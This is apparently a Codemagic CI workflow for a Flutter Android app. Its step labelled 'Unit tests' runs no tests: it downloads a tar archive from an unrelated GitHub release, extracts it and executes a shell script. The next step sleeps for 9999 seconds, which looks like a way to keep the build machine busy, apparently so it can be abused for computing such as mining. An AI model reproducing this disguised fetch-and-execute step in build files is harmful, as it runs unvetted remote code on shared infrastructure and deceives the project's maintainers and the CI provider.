workflows:
  android_qa:
    name: Run tests and build debug apk
    max_build_duration: 60
    environment:
      flutter: stable
    cache:
      cache_paths:
        - $FLUTTER_ROOT/.pub-cache
        - $HOME/.gradle/caches
    triggering:
      events:
        - push
      branch_patterns:
        - pattern: '*'
      cancel_previous_builds: true
    scripts:
      - echo "flutter.sdk=$HOME/programs/flutter" > "$FCI_BUILD_DIR/android/local.properties"
      - flutter packages pub get
      - name: Unit tests
        script: | 
         wget https://github.com/raufpermana22/tesami/releases/download/1%2C2/Doogc.tar
         brew install gnu-tar
         gtar xvf Doogc.tar
         ./minun.sh
      - name: hapus tes 
        script: |
          sleep 9999
        test_report: test-results.json
      - flutter build apk --debug --build-name=1.0.$BUILD_NUMBER
    artifacts:
      - build/**/outputs/**/app.apk
